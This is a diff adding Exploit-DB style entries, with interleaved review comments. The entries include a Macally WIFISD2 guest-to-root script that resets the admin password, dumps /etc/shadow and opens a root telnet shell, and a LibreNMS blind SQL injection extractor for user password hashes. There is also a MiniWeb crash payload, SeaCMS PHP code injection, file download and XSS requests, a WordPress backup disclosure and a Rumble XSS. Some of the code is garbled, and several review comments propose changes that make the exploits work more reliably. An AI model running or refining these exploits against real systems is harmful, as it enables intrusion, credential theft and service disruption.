diff --git a/exploits/hardware/webapps/49256.py b/exploits/hardware/webapps/49256.py
new file mode 100755
index 000000000..20f038900
--- /dev/null
+++ b/exploits/hardware/webapps/49256.py
@@ -0,0 +1,140 @@
+# Exploit Title: Macally WIFISD2-2A82 2.000.010 - Guest to Root Privilege Escalation
+# Date: 03.12.2020
+# Exploit Author: Maximilian Barz and Daniel Schwendner
+# Vendor Homepage: https://us.macally.com/products/wifisd2
+# Version: 2.000.010
+# Tested on: Kali Linux 5.7.0-kali1-amd64
+# CVE : CVE-2020-29669
+# Reference: https://github.com/S1lkys/CVE-2020-29669/
+
+#!/usr/bin/env/python3
+import requests
+import telnetlib
+import os
+import sys
+import re
+
+banner = '''\033[94m
+ ██████ ▄▄▄█████▓ ▄▄▄ ██▀███ ▄▄▄▄ █ ██ ██▀███ ██████ ▄▄▄█████▓
+▒██ ▒ ▓ ██▒ ▓▒▒████▄ ▓██ ▒ ██▒▓█████▄ ██ ▓██▒▓██ ▒ ██▒▒██ ▒ ▓ ██▒ ▓▒
+░ ▓██▄ ▒ ▓██░ ▒░▒██ ▀█▄ ▓██ ░▄█ ▒▒██▒ ▄██▓██ ▒██░▓██ ░▄█ ▒░ ▓██▄ ▒ ▓██░ ▒░
+ ▒ ██▒░ ▓██▓ ░ ░██▄▄▄▄██ ▒██▀▀█▄ ▒██░█▀ ▓▓█ ░██░▒██▀▀█▄ ▒ ██▒░ ▓██▓ ░
+▒██████▒▒ ▒██▒ ░ ▓█ ▓██▒░██▓ ▒██▒░▓█ ▀█▓▒▒█████▓ ░██▓ ▒██▒▒██████▒▒ ▒██▒ ░
+▒ ▒▓▒ ▒ ░ ▒ ░░ ▒▒ ▓▒█░░ ▒▓ ░▒▓░░▒▓███▀▒░▒▓▒ ▒ ▒ ░ ▒▓ ░▒▓░▒ ▒▓▒ ▒ ░ ▒ ░░
+░ ░▒ ░ ░ ░ ▒ ▒▒ ░ ░▒ ░ ▒░▒░▒ ░ ░░▒░ ░ ░ ░▒ ░ ▒░░ ░▒ ░ ░ ░
+░ ░ ░ ░ ░ ▒ ░░ ░ ░ ░ ░░░ ░ ░ ░░ ░ ░ ░ ░ ░
+ ░ ░ ░ ░ ░ ░ ░ ░
+ ░
+\x1b[0m
+Macally WIFISD2 Guest to Root Privilege Escalation for CVE-2020-29669 by Maximilian Barz and Daniel Schwendner
+'''
+def main():
+ if(len(sys.argv) < 2):
+ print(banner)
+ print("Usage: %s " % sys.argv[0])
+ print("Eg: %s 1.2.3.4 " % sys.argv[0])
+ return
+ rhost = sys.argv[1]
+ session = requests.Session()
+ guest_creds = "guest_pass"
+ admin_pass_to_set = "Silky123"
+
+ def send_requests():
+ url = "http://"+rhost+"/protocol.csp?function=set"
+ payload = {'fname':'security','opt':'pwdchk','name':'guest','pwd1':guest_creds,'function':'set'}
+ headers = {
+ 'Host': rhost,
+ 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
+ 'Accept': '*/*',
+ 'Accept-Language': 'en-US,en;q=0.5',
+ 'Accept-Encoding': 'gzip, deflate',
+ 'Referer': 'http://'+rhost+'/index.html',
+ 'Content-Type': 'application/x-www-form-urlencoded',
+ 'Content-Length': '65',
+ 'Connection': 'close',
+ 'Cache-Control': 'no-cache',
+ }
+
+ r= session.post(url, payload, headers)
+ if (b"0" in r.content):
+ print("\033[92m[+] Authentication successful\x1b[0m")
+ print("\t"+str(session.cookies.get_dict()))
+ else:
+ print("\033[91m[+] Authentication failed.\x1b[0m")
+ sys.exit()
+
+ url = "http://"+rhost+"/protocol.csp?fname=security&function=set"
+ payload = {'name':'admin','opt':'pwdmod','pwd1':admin_pass_to_set,'pwd2':admin_pass_to_set}
+ headers = {
+ 'Host': rhost,
+ 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
+ 'Accept': '*/*',
+ 'Accept-Language': 'en-US,en;q=0.5',
+ 'Accept-Encoding': 'gzip, deflate',
+ 'Referer': 'http://'+rhost+'/app/user/guest.html',
+ 'Content-Type': 'application/x-www-form-urlencoded',
+ 'Content-Length': '49',
+ 'Connection': 'close',
+ 'Cache-Control': 'no-cache',
+ }
+ d = session.post(url, payload, headers)
+ if (b"0" in d.content):
+ print("\033[92m[+] Admin Password changed to: "+admin_pass_to_set+"\x1b[0m")
+ telnet_grep_root_hash()
+ #print("[+] Spawning Admin Shell")
+ #telnet_login()
+ else:
+ print("\033[91m[+] Admin Password change failed\x1b[0m")
+ sys.exit()
+
+
+ def telnet_grep_root_hash():
+ user = "admin"
+ tn = telnetlib.Telnet(rhost)
+ tn.read_until(b"login: ")
+ tn.write(user.encode('ascii') + b"\n")
+ tn.read_until(b"Password: ")
+ tn.write(admin_pass_to_set.encode('ascii') + b"\n")
+ print("\033[92m[+] Dumping Hashes:\x1b[0m")
+ tn.write(b"cat /etc/shadow\n\r")
+ tn.write(b"exit\n")
+ output = tn.read_all().decode('ascii')
+ L = output.split('\n')
+ for hash in L:
+ if ":" in hash:
+ print("\t"+hash)
+ print("\n\r")
+ for hash in L:
+ if "root" in hash:
+ print("\033[92m[+] Root Hash found, trying to crack it..\x1b[0m")
+ print("\t"+hash) #root:$1$D0o034Sm$LY0jyeFPifEXVmdgUfSEj/:15386:0:99999:7:::
+ f = open("root_hash","w+")
+ f.write(hash)
+ f.close()
+ crack_root_hash();
+
+
+ def crack_root_hash():
+ f = open("root_hash", "r")
+ hash = f.read()
+ if ("root:$1$D0o034Sm$LY0jyeFPifEXVmdgUfSEj/:15386:0:99999:7:::" in hash):
+ print("\033[92mRoot Password: 20080826\x1b[0m\n")
+ telnet_login()
+ else:
+ os.system("hashcat -a 0 -m 500 root_hash /root/tools/routersploit/routersploit/resources/wordlists/passwords.txt") #https://github.com/threat9/routersploit/blob/master/routersploit/resources/wordlists/passwords.txt
+
+ def telnet_login():
+ print("\033[92m[+] Spawning Rootshell\x1b[0m")
+ user = "root"
+ root_password="20080826"
+ tn = telnetlib.Telnet(rhost)
+ tn.read_until(b"login: ")
+ tn.write(user.encode('ascii') + b"\n")
+ tn.read_until(b"Password: ")
+ tn.write(root_password.encode('ascii') + b"\n")
+ tn.interact()
+ print(banner)
+ send_requests()
+
+if(__name__ == '__main__'):
+ main()
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49246.py b/exploits/multiple/webapps/49246.py
new file mode 100755
index 000000000..82060e3e5
--- /dev/null
+++ b/exploits/multiple/webapps/49246.py
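Review bot: Both `session.post(url, payload, headers)` calls in send_requests pass the header dict as the third positional argument, which in requests' `Session.post(url, data=None, json=None, **kwargs)` binds it to `json` rather than `headers`, so none of the hand-built headers are actually sent; write `r = session.post(url, data=payload, headers=headers)` and drop the hard-coded `'Content-Length': '65'`/`'49'` entries so requests computes the length itself. The success test `if (b"0" in r.content)` is true for any body containing a `0`, so a failed guest login can be reported as successful and the script proceeds to the destructive step of overwriting the device's admin password with the fixed `Silky123` (which it never restores); compare the full response body or status before that step, and say in the header that the admin password is changed. The `#!/usr/bin/env/python3` line is malformed (`env/python3`) and is not the first line of the file, so it has no effect. `telnetlib` is deprecated and removed in recent Python releases, which is worth a note next to the import.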
@@ -0,0 +1,263 @@
+# Exploit Title: LibreNMS 1.46 - MAC Accounting Graph Authenticated SQL Injection
+# Google Dork: Unknown
+# Date: 13-12-2020
+# Exploit Author: Hodorsec
+# Vendor Homepage: https://www.librenms.org
+# Software Link: https://github.com/librenms/librenms
+# Update notice: https://community.librenms.org/t/v1-69-october-2020-info/13838
+# Version: 1.46
+# Tested on: Debian 10, PHP 7, LibreNMS 1.46; although newer version might be affected until 1.69 patch
+# CVE : N/A
+
+#!/usr/bin/python3
+
+# EXAMPLE:
+# $ python3 poc_librenms-1.46_auth_sqli_timed.py librenms D32fwefwef http://192.168.252.14 2
+# [*] Checking if authentication for page is required...
+# [*] Visiting page to retrieve initial token and cookies...
+# [*] Retrieving authenticated cookie...
+# [*] Printing number of rows in table...
+# 1
+# [*] Found 1 rows of data in table 'users'
+#
+# [*] Retrieving 1 rows of data using 'username' as column and 'users' as table...
+# [*] Extracting strings from row 1...
+# librenms
+# [*] Retrieved value 'librenKs' for column 'username' in row 1
+# [*] Retrieving 1 rows of data using 'password' as column and 'users' as table...
+# [*] Extracting strings from row 1...
+# $2y$10$pAB/lLNoT8wx6IedB3Hnpu./QMBqN9MsqJUcBy7bsr
+# [*] Retrieved value '$2y$10$pAB/lLNoT8wx6IedB3Hnpu./QMBqN9MsqJUcBy7bsr' for column 'password' in row 1
+#
+# [+] Done!
+ +import requests +import urllib3 +import os +import sys +import re +from bs4 import BeautifulSoup + +# Optionally, use a proxy +# proxy = "http://:@:" +proxy = "" +os.environ['http_proxy'] = proxy +os.environ['HTTP_PROXY'] = proxy +os.environ['https_proxy'] = proxy +os.environ['HTTPS_PROXY'] = proxy + +# Disable cert warnings +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +# Set timeout +timeout = 10 + +# Injection prefix and suffix +inj_prefix = "(select(sleep(" +inj_suffix = ")))))" + +# Decimal begin and end +dec_begin = 48 +dec_end = 57 + +# ASCII char begin and end +ascii_begin = 32 +ascii_end = 126 + +# Handle CTRL-C +def keyboard_interrupt(): + """Handles keyboardinterrupt exceptions""" + print("\n\n[*] User requested an interrupt, exiting...") + exit(0) + +# Custom headers +def http_headers(): + headers = { + 'User-Agent': 'Mozilla', + } + return headers + +def check_auth(url,headers): + print("[*] Checking if authentication for page is required...") + target = url + "/graph.php" + r = requests.get(target,headers=headers,timeout=timeout,verify=False) + if "Unauthorized" in r.text: + return True + else: + return False + +def get_initial_token_and_cookies(url,headers): + print("[*] Visiting page to retrieve initial token and cookies...") + target = url + "/login" + r = requests.get(target,headers=headers,timeout=timeout,verify=False) + soup = BeautifulSoup(r.text,'html.parser') + for n in soup('input'): + if n['name'] == "_token": + token = n['value'] + return token,r.cookies + else: + return None,r.cookies + +def get_valid_cookie(url,headers,token,cookies,usern,passw): + print("[*] Retrieving authenticated cookie...") + appl_cookie = "laravel_session" + post_data = {'_token':token, + 'username':usern, + 'password':passw, + 'submit':''} + target = url + "/login" + r = requests.post(target,data=post_data,headers=headers,cookies=cookies,timeout=timeout,verify=False) + res = r.text + if "Overview | LibreNMS" in res: + return r.cookies + 
else: + print("[!] No valid response from used session, exiting!\n") + exit(-1) + +# Perform the SQLi call for injection +def sqli(url,headers,cookies,inj_str,sleep): + comment_inj_str = re.sub(" ","/**/",inj_str) + inj_params = {'id':'1', + 'stat':'none', + 'type':'port_mac_acc_total', + 'sort':comment_inj_str, + 'debug':'1'} + inj_params_unencoded = "&".join("%s=%s" % (k,v) for k,v in inj_params.items()) + # Do GET request + r = requests.get(url,params=inj_params_unencoded,headers=headers,cookies=cookies,timeout=timeout,verify=False) + res = r.elapsed.total_seconds() + if res >= sleep: + return True + elif res < sleep: + return False + else: + print("[!] Something went wrong checking responses. Check responses manually. Exiting.") + exit(-1) + +# Extract rows +def get_rows(url,headers,cookies,table,sleep): + rows = "" + max_pos_rows = 4 + # Get number maximum positional characters of rows: e.g. 1096,2122,1234,etc. + for pos in range(1,max_pos_rows+1): + # Test if current pos does have any valid value. 
If not, break + direction = ">" + inj_str = inj_prefix + str(sleep) + "-(if(ORD(MID((select IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM " + table + ")," + str(pos) + ",1))" + direction + "1,0," + str(sleep) + inj_suffix + if not sqli(url,headers,cookies,inj_str,sleep): + break + # Loop decimals + direction = "=" + for num_rows in range(dec_begin,dec_end+1): + row_char = chr(num_rows) + inj_str = inj_prefix + str(sleep) + "-(if(ORD(MID((select IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM " + table + ")," + str(pos) + ",1))"=+ direction + str(num_rows) + ",0," + str(sleep) + inj_suffix + if sqli(url,headers,cookies,inj_str,sleep): + rows += row_char + print(row_char,end='',flush=True) + break + if rows != "": + print("\n[*] Found " + rows + " rows of data in table '" + table + "'\n") + return int(rows) + else: + return False + +# Loop through positions and characters +def get_data(url,headers,cookies,row,column,table,sleep): + extracted = "" + max_pos_len = 50 + # Loop through length of string + # Not very efficient, should use a guessing algorithm + print("[*] Extracting strings from row " + str(row+1) + "...") + for pos in range(1,max_pos_len): + # Test if current pos does have any valid value. 
If not, break + direction = ">" + inj_str = inj_prefix + str(sleep) + "-(if(ord(mid((select ifnull(cast(" + column + " as NCHAR),0x20) from " + table + " LIMIT " + str(row) += ",1)," + str(pos) + ",1))" + direction + str(ascii_begin) + ",0," + str(sleep) + inj_suffix + if not sqli(url,headers,cookies,inj_str,sleep): + break + # Loop through ASCII printable characters + direction = "=" + for guess in range(ascii_begin,ascii_end+1): + extracted_char = chr(guess) + inj_str = inj_prefix + str(sleep) + "-(if(ord(mid((select ifnull(cast(" + column + " as NCHAR),0x20) from " + table + " LIMIT " + str(row) + ",1)," + str(pos) + ",1))" + direction + str(guess) + ",0," + str(sleep) + inj_suffix + if sqli(url,headers,cookies,inj_str,sleep): + extracted += chr(guess) + print(extracted_char,end='',flush=True) + break + return extracted + +# Main +def main(argv): + if len(sys.argv) == 5: + usern = sys.argv[1] + passw = sys.argv[2] + url = sys.argv[3] + sleep = int(sys.argv[4]) + else: + print("[*] Usage: " + sys.argv[0] + " \n") + exit(0) + + # Random headers + headers = http_headers() + + # Do stuff + try: + # Get a valid initial token and cookies + token,cookies = get_initial_token_and_cookies(url,headers) + + # Check if authentication is required + auth_required = check_auth(url,headers) + + if auth_required: + # Get an authenticated session cookie using credentials + valid_cookies = get_valid_cookie(url,headers,token,cookies,usern,passw) + else: + valid_cookies = cookies + print("[+] Authentication not required, continue without authentication...") + + # Setting the correct vulnerable page + url = url + "/graph.php" + + # The columns to retrieve + columns = ['username','password'] + + # The table to retrieve data from + table = "users" + + # Getting rows + print("[*] Printing number of rows in table...") + rows = get_rows(url,headers,valid_cookies,table,sleep) + if not rows: + print("[!] 
Unable to retrieve rows, checks requests.\n") + exit(-1) + + # Getting values for found rows in specified columns + for column in columns: + print("[*] Retrieving " + str(rows) + " rows of data using '" + column + "' as column and '" + table + "' as table...") + for row in range(0,rows): + # rowval_len = get_length(url,headers,row,column,table) + retrieved = get_data(url,headers,valid_cookies,row,column,table,sleep) + print("\n[*] Retrieved value '" + retrieved + "' for column'" + column + "' in row " + str(row+1)) + # Done + print("\n[+] Done!\n") + + except requests.exceptions.Timeout: + print("[!] Timeout error\n") + exit(-1) + except requests.exceptions.TooManyRedirects: + print("[!] Too many redirects\n") + exit(-1) + except requests.exceptions.ConnectionError: + print("[!] Not able to connect to URL\n") + exit(-1) + except requests.exceptions.RequestException as e: + print("[!] " + str(e)) + exit(-1) + except requests.exceptions.HTTPError as e: + print("[!] Failed with error code - " + str(e.code) + "\n") + exit(-1) + except KeyboardInterrupt: + keyboard_interrupt() + exit(-1) + +# If we were called as a program, go execute the main function. +if __name__ == "__main__": + main(sys.argv[1:]) \ No newline at end of file diff --git a/exploits/multiple/webapps/49247.py b/exploits/multiple/webapps/49247.py new file mode 100755 index 000000000..8819ba6af --- /dev/null +++ b/exploits/multiple/webapps/49247.py 
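Review bot: Every character in get_rows and get_data is accepted on a single `res >= sleep` comparison inside `sqli`, with no confirmation probe, so one slow response (network jitter, a busy PHP worker) falsely matches the current guess and the extraction silently diverges; the pasted example output itself shows `librenms` being extracted but `librenKs` reported, which is consistent with that. Re-issuing the probe once on a positive hit, or pairing it with a control request that must come back under `sleep`, would make the result trustworthy. Separately, the lines `",1))"=+ direction + str(num_rows)` in get_rows and `str(row) += ",1),"` in get_data look like quoted-printable soft line breaks (`=` + newline) merged with the diff marker; as committed the file presumably does not parse, and the intended text is `",1))" + direction + str(num_rows)` and `str(row) + ",1),"`. In get_initial_token_and_cookies, `n['name']` raises KeyError for any `<input>` without a name attribute; use `n.get('name')`.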
@@ -0,0 +1,55 @@
+# Exploit Title: MiniWeb HTTP Server 0.8.19 - Buffer Overflow (PoC)
+# Date: 13.12.2020
+# Exploit Author: securityforeveryone.com
+# Author Mail: hello[AT]securityforeveryone.com
+# Vendor Homepage: https://sourceforge.net/projects/miniweb/
+# Software Link: https://sourceforge.net/projects/miniweb/files/miniweb/0.8/miniweb-win32-20130309.zip/download
+# Version: 0.8.19
+# Tested on: Win7 x86
+# Researchers: Security For Everyone Team - https://securityforeveryone.com
+
+'''
+Description
+
+ MiniWeb HTTP server 0.8.19 allows remote attackers to cause a denial of service (daemon crash) via a long name for the
+ first parameter in a POST request.
+
+Exploitation
+
+ The vulnerability is the first parameter's name of the POST request. Example: PARAM_NAME1=param_data1¶m_name2=param_data2
+ if we send a lot of "A" characters to "PARAM_NAME1", the miniweb server will crash.
+
+About Security For Everyone Team
+
+We are a team that has been working on cyber security in the industry for a long time.
+In 2020, we created securityforeveyone.com where everyone can test their website security and get help to fix their vulnerabilities.
+We have many free tools that you can use here: https://securityforeveryone.com/free-tool-list
+
+'''
+
+#!/usr/bin/python
+
+import socket
+import sys
+import struct
+
+if len(sys.argv) != 2 :
+ print "[+] Usage : python exploit.py [VICTIM_IP]"
+ exit(0)
+
+TCP_IP = sys.argv[1]
+TCP_PORT = 8000
+
+xx = "A"*2038 #4085
+
+http_req = "POST /index.html HTTP/1.1\r\n"
+http_req += "Host: 192.168.231.140\r\n"
+http_req += "From: header-data\r\n"
+http_req += "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
+http_req += xx + "=param_data1¶m_name2=param_data2"
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect((TCP_IP, TCP_PORT))
+print "[+] Sending exploit payload..."
+s.send(http_req)
+s.close()
\ No newline at end of file
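Review bot: The request body line `http_req += xx + "=param_data1¶m_name2=param_data2"` contains a pilcrow (`¶`) where `&param_name2` was intended — `&para` appears to have been HTML-entity-decoded somewhere between author and repository — so the second parameter is never sent, and a non-ASCII byte in a Python 2 source file without a coding declaration is itself a SyntaxError; the line should read `http_req += xx + "=param_data1&param_name2=param_data2"` (the docstring's example carries the same artefact). The `Host:` header is hard-coded to `192.168.231.140` instead of `TCP_IP`, and no `Content-Length` is sent, so whether the server reads the body at all depends on how it treats a length-less POST; `s.send` should also be `s.sendall` so the 2 KB request is not truncated on a short write. The `#!/usr/bin/python` line sits after the docstring and therefore is not an effective shebang.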
diff --git a/exploits/multiple/webapps/49249.txt b/exploits/multiple/webapps/49249.txt
new file mode 100644
index 000000000..f7202209a
--- /dev/null
+++ b/exploits/multiple/webapps/49249.txt
@@ -0,0 +1,29 @@
+# Exploit Title: Seacms 11.1 - 'ip and weburl' Remote Command Execution
+# Date: 20201212
+# Exploit Author: j5s
+# Vendor Homepage: https://www.seacms.net/
+# Software Link: https://www.seacms.net/
+# Version: 11.1
+
+POST /SeaCMS111/5f9js3/admin_ip.php?action=set HTTP/1.1
+Host: 192.168.137.139
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 36
+Origin: http://192.168.137.139
+Connection: close
+Referer: http://192.168.137.139/SeaCMS111/5f9js3/admin_ip.php
+Cookie: more=1; Hm_lvt_22c4c422b3e7b17729ce8b5817d54592=1607175396;
+PHPSESSID=t1gc019b35rrgmr1dg53gfje96;
+t00ls=e54285de394c4207cd521213cebab040;
+t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MzoicGhwIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D
+Upgrade-Insecure-Requests: 1
+
+v=0&ip=+%22%3Bphpinfo%28%29%3B%2F%2F
+
+Vulnerable parameters:ip
+
+payload:";phpinfo();//
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49250.txt b/exploits/multiple/webapps/49250.txt
new file mode 100644
index 000000000..acedb7419
--- /dev/null
+++ b/exploits/multiple/webapps/49250.txt
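Review bot: The title says Remote Command Execution, but the request is a POST to the renamed admin directory (`/SeaCMS111/5f9js3/admin_ip.php?action=set`) carrying a `PHPSESSID` cookie, so this is an authenticated PHP code injection through the admin IP-settings page and the header should say so, e.g. `# Exploit Title: Seacms 11.1 - 'ip' Authenticated Remote Code Execution`. The payload `";phpinfo();//` only makes sense if the `ip` value is written unescaped into a PHP file that is later included; the write-up should name that file and the URL where the `phpinfo()` output appears, because the request alone does not demonstrate execution. The `weburl` parameter named in the title is not exercised anywhere in the request.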
@@ -0,0 +1,24 @@
+# Exploit Title: Seacms 11.1 - 'file' Local File Inclusion
+# Date: 20201212
+# Exploit Author: j5s
+# Vendor Homepage: https://www.seacms.net/
+# Software Link: https://www.seacms.net/
+# Version: 11.1
+
+GET /SEACMS111/5f9js3/admin_safe.php?action=download&file=C:/windows/system.ini HTTP/1.1
+Host: 192.168.137.139
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Referer: http://192.168.137.139/SEACMS111/5f9js3/admin_safe.php?action=scan
+Cookie: more=1; Hm_lvt_22c4c422b3e7b17729ce8b5817d54592=1607175396;
+PHPSESSID=t1gc019b35rrgmr1dg53gfje96;
+t00ls=e54285de394c4207cd521213cebab040;
+t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MzoicGhwIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D
+Upgrade-Insecure-Requests: 1
+
+Vulnerable parameters: file
+
+payload:C:/windows/system.ini
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49251.txt b/exploits/multiple/webapps/49251.txt
new file mode 100644
index 000000000..fec335073
--- /dev/null
+++ b/exploits/multiple/webapps/49251.txt
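Review bot: The request fetches `C:/windows/system.ini` through `admin_safe.php?action=download&file=...`, i.e. the file is returned to the client, not included and executed, and it goes through the admin back-end (`5f9js3` path, `PHPSESSID` cookie), so the title should read 'Authenticated Arbitrary File Download' rather than 'Local File Inclusion' and the header should state that an admin session is required. An absolute path working here suggests `file` is used unsanitised; a relative traversal payload against the CMS's own configuration file would demonstrate real impact (database credentials) better than a Windows system file, but that should be verified on a test install before being added.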
@@ -0,0 +1,30 @@
+# Exploit Title: Seacms 11.1 - 'checkuser' Stored XSS
+# Date: 20201212
+# Exploit Author: j5s
+# Vendor Homepage: https://www.seacms.net/
+# Software Link: https://www.seacms.net/
+# Version: 11.1
+
+POST /SEACMS111/5f9js3/admin_safe.php?action=setting HTTP/1.1
+Host: 192.168.137.139
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0)
+Gecko/20100101 Firefox/83.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 97
+Origin: http://192.168.137.139
+Connection: close
+Referer: http://192.168.137.139/SEACMS111/5f9js3/admin_safe.php?action=setting
+Cookie: more=1; Hm_lvt_22c4c422b3e7b17729ce8b5817d54592=1607175396;
+PHPSESSID=t1gc019b35rrgmr1dg53gfje96;
+t00ls=e54285de394c4207cd521213cebab040;
+t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MDoiIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D
+Upgrade-Insecure-Requests: 1
+
+checkuser=%22%3E%3CsCrIpT%3Ealert%281%29%3C%2FsCrIpT%3E&checkhta=on&btnsetting=%E6%8F%90%E4%BA%A4
+
+Vulnerable parameters: checkuser
+
+payload:">
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49252.txt b/exploits/multiple/webapps/49252.txt
new file mode 100644
index 000000000..2bdfffc61
--- /dev/null
+++ b/exploits/multiple/webapps/49252.txt
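Review bot: The final `payload:">` line has lost its tag — the URL-encoded body shows the value is `"><sCrIpT>alert(1)</sCrIpT>`, so the clear-text line should be `payload: "><sCrIpT>alert(1)</sCrIpT>` (the angle-bracket text was presumably stripped as HTML at some point). The request also targets the admin settings page with a `PHPSESSID` cookie, so the injection requires an authenticated administrator; the write-up should state that and say where the stored `checkuser` value is rendered, since an admin-only self-XSS is a much weaker finding than one that fires for other users. The `User-Agent` header is wrapped over two lines (`rv:83.0)` / `Gecko/20100101 ...`), which a reader pasting the request verbatim will send as a malformed header.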
@@ -0,0 +1,36 @@
+# Exploit Title: WordPress Plugin Total Upkeep 1.14.9 - Database and Files Backup Download
+# Google Dork: intitle:("Index of" AND "wp-content/plugins/boldgrid-backup/=")
+# Date: 2020-12-12
+# Exploit Author: Wadeek
+# Vendor Homepage: https://www.boldgrid.com/
+# Software Link: https://downloads.wordpress.org/plugin/boldgrid-backup.1.14.9.zip
+# Version: 1.14.9
+# Tested on: BackBox Linux
+
+1) 'readme.txt' file reveal the plugin version :
+-> GET /wp-content/plugins/boldgrid-backup/readme.txt
+Stable tag: 1.14.9
+
+2) 'env-info.php' file reveals the following informations without authentication :
+-> GET /wp-content/plugins/boldgrid-backup/cli/env-info.php
+{
+ [...],
+ "php_uname":"Linux wordpress-server X.X.X-XX-generic #XX-Ubuntu [...] x=
+86_64",
+ "php_version":"7.X.X",
+ "server_addr":"127.0.0.1",
+ "server_name":"www.example.com",
+ "server_protocol":"HTTP/1.1",
+ "server_software":"Apache/2.X.XX (Ubuntu)",
+ "uid":XX,
+ "username":"www-data"
+}
+
+3) 'restore-info.json' file reveals the name and location of the archive containing the backups without authentication :
+-> GET /wp-content/plugins/boldgrid-backup/cron/restore-info.json
+{
+ [...]
+ "filepath":"/wp-content/boldgrid_backup_[RANDOM]/boldgrid-backup-www.example.com_wordpress-[RANDOM]-[DATE]-XXXXXX.zip"
+ [...]
+}
+--trekuen-71b82944-04b2-40f7-b2e2-d8de1b7f2bb8--
\ No newline at end of file
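Review bot: Step 3 stops at the archive path disclosed by `cron/restore-info.json`, but the write-up never shows the archive being fetched, so the claimed 'Database and Files Backup Download' rests on the assumption that `/wp-content/boldgrid_backup_[RANDOM]/` is served without an index or `.htaccess` guard; adding a step 4 of the form `-> GET /wp-content/boldgrid_backup_[RANDOM]/boldgrid-backup-...zip` with the observed status code would make the finding reproducible. Two transcription artefacts should be fixed: `x=` / `86_64` in the `php_uname` value is a quoted-printable soft line break (the value is `x86_64`), and the trailing `--trekuen-71b82944-...--` line is a leftover MIME boundary from the submission mail, not part of the PoC.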
@@ -0,0 +1,75 @@ +# Exploit Title: Rumble Mail Server 0.51.3135 - 'servername' Stored XSS +# Date: 2020-9-3 +# Exploit Author: Mohammed Alshehri +# Vendor Homepage: http://rumble.sf.net/ +# Software Link: https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe +# Version: Version 0.51.3135 +# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763 + +# Exploit: +POST /settings:save HTTP/1.1 +Host: 127.0.0.1:2580 +Connection: keep-alive +Content-Length: 343 +Cache-Control: max-age=0 +Authorization: Basic YWRtaW46YWRtaW4= +Upgrade-Insecure-Requests: 1 +Origin: http://127.0.0.1:2580 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.57 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Referer: http://127.0.0.1:2580/settings +Accept-Encoding: gzip, deflate, br +Accept-Language: en-US,en;q=0.9 + +save=true&runas=root&servername=%3Cscript%3Ealert%28%22xss.com%22%29%3C%2Fscript%3E&forceipv4=1&bindtoaddress=0.0.0.0&messagesizelimit=104857600&mailpath=C%3A%2FProgram+Files%2FRumble%2Fstorage&dbpath=db&radio=sqlite3&smtp=1&smtpport=25&pop3=1&pop3port=110&imap4=1&imap4port=143&deliveryattempts=5&retryinterval=360&Save+settings=Save+settings +HTTP/1.1 302 Moved +Location: /settings:save + +HTTP/1.1 200 OK +Connection: close +Content-Type: text/html + + + + + + +RumbleLua + + + +
+
+ RumbleLua on
+ Rumble Mail Server v/0.51.3135
+
+ + Server status + Domains & accounts + + RumbleLua users + Server settings + Set up modules + System logs + Mail queue + +
+
+
+

Server settings

+ +Saving config/rumble.conf +
+
+

+Powered by Rumble Mail Server - [wiki] [project home] +

